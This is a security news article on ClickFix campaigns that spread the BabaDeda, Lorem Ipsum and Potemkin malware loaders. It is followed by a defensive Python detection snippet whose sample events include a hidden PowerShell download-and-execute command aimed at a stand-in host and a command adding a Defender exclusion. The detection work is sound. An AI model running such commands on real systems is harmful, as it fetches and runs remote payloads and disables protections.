
ClickFix Campaigns Distribute Malware Loaders BabaDeda, Lorem Ipsum, and Potemkin


Key Point: Three new malware loaders (BabaDeda, Lorem Ipsum, Potemkin) are distributed via ClickFix social engineering and compromised WordPress sites and enable data theft, ransomware, and remote control.

Attackers exploit the ClickFix method with forged browser error messages to trick users into manually executing PowerShell commands. This deploys three new malware loaders to Windows systems that serve as entry points for backdoors, infostealers, and ransomware.

Security researchers have documented campaigns using ClickFix lures to spread malware. Attackers spoof browser error messages or security warnings and trick users into manually executing PowerShell commands. These commands download loaders that act as the initial infection stage and decrypt and load additional malware. To date, three different loaders have been identified: BabaDeda, Lorem Ipsum, and Potemkin. All three employ techniques to bypass security mechanisms and keep their payloads encrypted until immediately before execution, which makes forensic analysis and detection by endpoint protection tools more difficult.

The BabaDeda loader was previously deployed against crypto and Web3 organizations but is now increasingly targeting education and financial organizations. The malware checks the system and refuses to run on computers in Russia or Belarus. After activation, the loader injects malicious functionality into legitimate Windows processes such as svchost.exe. The deployed backdoors and infostealers steal browser data, cookies, and credentials, create screenshots, and exfiltrate files to command servers. Researchers describe the revamped framework as “a much more capable loader designed for stealth, evasion, and payload flexibility.”

A second threat actor, tracked as Vanilla Tempest, uses compromised WordPress websites as a distribution point for the Lorem Ipsum loader. Victims are redirected via ClickFix lures posing as security updates for Microsoft Edge. After infection, an outdated Node.js version is used to execute JavaScript-based droppers that load a backdoor. This chain frequently results in the deployment of ransomware such as Rhysida. Security researchers view the shift to compromised WordPress sites as a strategy that significantly expands the pool of potential victims.

A third campaign deploys the Potemkin loader, which is launched via HTA (HTML Application) files delivered in MSI package format. Potemkin uses a domain generation algorithm for communication with command servers and serves as a distribution channel for EtherRAT and RMMProject. The latter enables remote screen control, extraction of browser data while bypassing its encryption protection, and execution of arbitrary Lua scripts. Once system access is established, attackers manually configure Microsoft Defender exclusions, set up tunneled access via Cloudflare, and spread laterally to the domain controller.
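As an added defender-side example (not code from the article or from the researchers it cites), the following Python applies simple heuristics to process-creation events that correspond to the stages described above: a PowerShell command run from the shell with hidden-window or policy-bypass flags and a download-and-run cue, Defender exclusions added from the command line, a Node.js runtime executing from outside Program Files, and mshta.exe launching an HTA file. All event fields, paths and command lines are constructed sample data, not indicators from the report.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation events (parent image, image, command line) that mimic
# the stages in the article; they are sample data, not indicators from the report.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -ep bypass -c "iwr http://lure.invalid/x | iex"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell Add-MpPreference -ExclusionPath C:\Users\Public"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Users\Public\node\node.exe",
     "cmdline": r"node.exe C:\Users\Public\a.js"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Program Files\nodejs\node.exe",
     "cmdline": r"node.exe build.js"},                       # benign developer use
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Users\Public\update.hta"},
]

EVASION_FLAGS = re.compile(r"-w(indowstyle)?\s+hidden|-e(p|xecutionpolicy)\s+bypass|-nop\b", re.I)
DOWNLOAD_EXEC = re.compile(r"\b(iwr|invoke-webrequest|downloadstring|iex|invoke-expression)\b", re.I)

def match_rules(ev):
    """Return the names of the heuristics the event trips (empty list if none)."""
    image = PureWindowsPath(ev["image"]).name.lower()
    parent = PureWindowsPath(ev["parent"]).name.lower()
    cmd = ev["cmdline"]
    hits = []
    # ClickFix step: PowerShell launched from the shell (Run dialog / pasted command)
    # with hidden-window or policy-bypass flags plus a download-and-run cue.
    if image == "powershell.exe" and parent == "explorer.exe" \
            and EVASION_FLAGS.search(cmd) and DOWNLOAD_EXEC.search(cmd):
        hits.append("clickfix_powershell")
    # Hands-on-keyboard step: Defender exclusions added from the command line.
    if re.search(r"add-mppreference\b.*-exclusion", cmd, re.I):
        hits.append("defender_exclusion_change")
    # Lorem Ipsum chain: a node.exe runtime executing from outside Program Files.
    if image == "node.exe" and not ev["image"].lower().startswith("c:\\program files"):
        hits.append("node_unusual_path")
    # Potemkin chain: mshta.exe launching an .hta file or a remote URL.
    if image == "mshta.exe" and re.search(r"https?://|\.hta\b", cmd, re.I):
        hits.append("mshta_hta_launch")
    return hits

def triage(events):
    """Pair each flagged event's command line with its rule hits."""
    return [(ev["cmdline"], hits) for ev in events if (hits := match_rules(ev))]
```

These heuristics are starting points for hunting in EDR or Sysmon telemetry; tune the Program Files and parent-process checks to the software inventory of the environment.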


Source: www.it-daily.net · Published June 17, 2026
Lumi AI News — AI-assisted curation in accordance with Article 50 EU AI Act. Paraphrase and classification by Lumi News Pipeline v1.7.1.
